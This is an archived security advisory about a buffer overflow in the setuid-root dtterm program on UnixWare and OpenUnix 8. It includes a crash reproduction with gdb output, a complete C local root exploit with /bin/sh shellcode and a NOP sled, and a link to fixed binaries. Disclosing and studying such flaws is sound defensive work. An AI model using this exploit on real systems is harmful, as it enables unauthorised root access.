TUCoPS :: SCO :: sco4776.htm

TUCoPS :: SCO :: sco4776.htm
dtterm buffer overflow
3rd Oct 2001 [SBWID-4776]
COMMAND

	dtterm buffer overflow

SYSTEMS AFFECTED

	UnixWare OpenUnix 8

PROBLEM

	Aycan İrican found following as posted on BugTraq :
	

	Another dt series bug...
	 

	$ uname -a 

	OpenUNIX zen 5 8.0.0 i386 x86at Caldera UNIX_SVR5 

	$ id 

	uid=101(fixxxer) gid=1(other) 

	$ ls -al /usr/dt/bin/dtterm 

	- -r-sr-xr-x 1 root bin 60892 Haz 10 05:03 

	/usr/dt/bin/dtterm 

	$ /usr/dt/bin/dtterm -tn `perl -e \'print \"A\"x1040\'` 

	Warning: Missing charsets in String to FontSet conversion 

	Warning: Missing charsets in String to FontSet conversion 

	Memory fault 

	

	 # /usr/gnu/bin/gdb /usr/dt/bin/dtterm 

	(no debugging symbols found)... 

	(gdb) set args -tn `perl -e \'print \"A\"x1040\'` 

	(gdb) run 

	Starting program: /usr/dt/bin/dtterm -tn `perl -e \'print \"A\"x1040\'` 

	(no debugging symbols found)...(no debugging symbols found)... 

	... 

	.. 

	[New LWP 2] 

	

	 Program received signal SIGSEGV, Segmentation fault. 

	0xbff9a4b8 in strncmp () from /usr/lib/libc.so.1 

	[New Thread 1] 

	(gdb)set args -tn `perl -e \'print \"A\"x1042\'` 

	(gdb) run 

	Starting program: /usr/dt/bin/dtterm -tn `perl -e \'print \"A\"x1042\'` 

	(no debugging symbols found)...(no debugging symbols found)... 

	[New LWP 2] 

	

	 Program received signal SIGSEGV, Segmentation fault. 

	0xbff3abca in _mergeEnv () from /usr/dt/lib/libDtTerm.so.1 

	[New Thread 1] 

	(gdb)q 

	

	

	self-explained... enjoy...
	

	 Update : Exploit for UnixWare 7.1.1

	 ======

	

	/*

	 * dtterm buffer overflow by jGgM

	 * http://www.netemperor.com/en/

	 * EMail: jggm@mail.com

	 * 

	*/

	#include <stdio.h>

	#include <stdlib.h>

	

	char shell[] =

	  \"\\xeb\\x48\\x9a\\xff\\xff\\xff\\xff\\x07\\xff\\xc3\\x5e\\x31\\xc0

	\\x89\\x46\\xb4\"

	  \"\\x88\\x46\\xb9\\x88\\x46\\x07\\x89\\x46\\x0c\\x31\\xc0\\x50

	\\xb0\\x8d\\xe8\\xdf\"

	  \"\\xff\\xff\\xff\\x83\\xc4\\x04\\x31\\xc0\\x50\\xb0\\x17\\xe8\\xd2

	\\xff\\xff\\xff\"

	  \"\\x83\\xc4\\x04\\x31\\xc0\\x50\\x8d\\x5e\\x08\\x53

	\\x8d\\x1e\\x89\\x5e\\x08\\x53\"

	  \"\\xb0\\x3b\\xe8\\xbb\\xff\\xff\\xff\\x83\\xc4\\x0c\\xe8

	\\xbb\\xff\\xff\\xff\\x2f\"

	  \"\\x62\\x69\\x6e\\x2f\\x73\\x68

	\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\";

	

	#define NOP	0x90

	#define LEN		102

	

	#define BUFFER_SIZE	1052

	#define RET_LENGTH	10

	#define ADJUST		4

	

	long get_sp(void) {

	   __asm__(\"movl %esp, %eax\");

	}

	

	int

	main(int argc, char *argv[])

	{

	   char buffer[BUFFER_SIZE+(RET_LENGTH*4)+1];

	   long offset, ret;

	   int  x, y;

	

	   if(argc > 2) {

	      fprintf(stderr, \"Usage: %s [offset]\\n\", argv[0]);

	      exit(1);

	   } // end of if..

	

	   if(argc == 2) offset = atol(argv[1]);

	   else offset = 0;

	

	   ret = get_sp() + 900 + offset;

	

	   for(x=0; x<BUFFER_SIZE; x++) buffer[x] = NOP;

	

	   x = BUFFER_SIZE - strlen(shell) - ADJUST;

	

	   for(y=0; y<strlen(shell); y++)

	      buffer[x++] = shell[y];

	

	   for(y=0; y<RET_LENGTH; y++, x += 4)

	      *((int *)&buffer[x]) = ret;

	

	   buffer[x] = 0x00;

	

	   printf(\"ret = 0x%x,\\n\", ret);

	   printf(\"offset = %d\\n\", offset);

	   printf(\"buffer size = %d\\n\", strlen(buffer));

	   execl(\"/usr/dt/bin/dtterm\", \"dtterm\", \"-xrm\", buffer, 

	NULL);

	   printf(\"exec failed\\n\");

	}

	

SOLUTION

	Fixed binaries can be found at :
	

	     ftp://stage.caldera.com/pub/security/openunix/CSSA-2001-SCO.26/

	     md5 checksums: 30167e121f4d7e0bf0bf06e60cb3a340	erg711857.Z